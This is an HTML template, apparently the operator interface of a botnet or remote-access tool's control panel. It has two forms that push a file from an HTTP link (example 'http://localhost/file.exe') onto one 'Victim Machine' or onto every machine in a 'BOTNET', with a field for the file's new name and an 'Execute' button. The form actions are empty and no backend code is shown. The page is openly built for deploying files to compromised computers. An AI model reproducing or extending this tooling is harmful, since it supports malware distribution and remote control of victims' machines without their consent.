<app-menu></app-menu>
<h2>PUT FILES FROM VICTIM MACHINE</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to put a file on Victim Machine. The file must be in a HTTP server. Ex. "http://localhost/file.exe".</p>
  <p>Link http of the file we want to put in <input type="text" /></p>
  <p>Name + extension we want to rename inside the Victim Machine<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>

<h2>PUT FILES FROM VICTIM MACHINES - BOTNET</h2>
<hr />
<form action="" class="form">
  <!--form action es donde se mandará la info al php-->
  <p class="title">Enter parameters to put a file on Victim Machines. The file must be in a HTTP server. Ex. "http://localhost/file.exe".</p>
  <p>Link http of the file we want to put in <input type="text" /></p>
  <p>Name + extension we want to rename inside the Victim Machine<input type="text" /></p>
  <input type="submit" value="Execute" />
</form>
